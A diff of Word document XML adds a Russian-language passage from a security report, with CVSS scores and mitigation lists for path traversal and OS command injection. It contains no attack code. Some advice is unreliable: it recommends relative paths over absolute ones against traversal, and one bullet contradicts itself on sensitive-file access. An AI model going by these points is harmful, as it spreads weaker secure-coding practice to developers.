+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Вектор CVSS (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Базовая оценка 7.5 </w:t>
+      </w:r>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рекомендации по защите от</w:t>
+      </w:r>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Path Traversal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> включают в себя следующее:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="45"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">проводите валидацию и фильтрацию входных данных, которые могут быть подвержены атакам Path Traversal. Убедитесь, что все пользовательские вводы проходят через механизмы валидации и фильтрации, чтобы предотвратить передачу специальных символов, которые могут</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> использоваться для обхода ограничений;</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="45"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ограничьте доступ к файлам и директориям на сервере таким образом, чтобы только авторизованные пользователи имели доступ к необходимым ресурсам. Не предоставляйте доступ к чувствительным системным файлам или директориям, если это необходимо;</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="45"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">вместо абсолютных путей используйте относительные пути при доступе к файлам и директориям на сервере. Это поможет предотвратить обход ограничений, связанных с абсолютными путями файловой системы;</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="45"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">проверяйте права доступа и авторизацию пользователя перед предоставлением доступа к файлам и директориям на сервере. Убедитесь, что пользователи имеют необходимые права доступа к запрашиваемым ресурсам;</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="45"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">используйте белый список (whitelist) файлов и директорий, которые могут быть запрашиваемыми пользователем. Это позволит предотвратить доступ к нежелательным или опасным ресурсам;</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="45"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ведите журнал всех запросов к файловой системе сервера и мониторьте их на наличие подозрительной активности, такой как попытки обхода ограничений или доступ к недопустимым ресурсам;</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="45"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">регулярно обновляйте и анализируйте код приложения на предмет уязвимостей Path Traversal.</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Применение этих методов защиты поможет уменьшить риск успешных атак Path Traversal на вашем сервере и обеспечит безопасность вашей файловой системы.</w:t>
+      </w:r>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Remote OS Command Injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (CWE 78)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Вектор CVSS (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Базовая оценка 10.0 </w:t>
+      </w:r>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Защита от атак Remote OS Command Injection включает в себя применение различных методов на уровне приложения, сервера и сети</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">всегда используйте параметризованные запросы при выполнении операций с базой данных или операционной системой. Это поможет избежать возможности внедрения вредоносного кода через пользовательский ввод;</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">экранируйте специальные символы и метасимволы, такие как кавычки, разделители команд и пробелы, чтобы предотвратить внедрение вредоносного кода;</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ограничьте доступ к системным командам и операциям на сервере, например, путем установки ограничений прав доступа или использования привилегий пользователя;</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">предоставляйте только минимальные права доступа приложению и пользователям к системным ресурсам. Ограничьте доступ к системным командам и функциям, которые не являются необходимыми для работы приложения;</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">регулярно обновляйте и анализируйте код приложения на предмет уязвимостей Remote OS Command Injection;</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">используйте белый список (whitelist) разрешенных команд и операций, которые могут быть выполнены из приложения. Это поможет ограничить возможности злоумышленников;</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">обучайте разработчиков и тестировщиков на предмет атак Remote OS Command Injection и методов их предотвращения.</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Применение этих методов защиты поможет снизить риск успешных атак Remote OS Command Injection и обеспечить безопасность вашего приложения и сервера.</w:t>
+      </w:r>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="nil"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br w:type="page" w:clear="all"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="895"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
@@ -22469,7 +23821,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -22538,7 +23890,7 @@
 <w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="961"/>
+      <w:pStyle w:val="971"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:r>
@@ -22560,7 +23912,7 @@
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="961"/>
+      <w:pStyle w:val="971"/>
     </w:pPr>
     <w:r/>
     <w:r/>
@@ -22599,7 +23951,7 @@
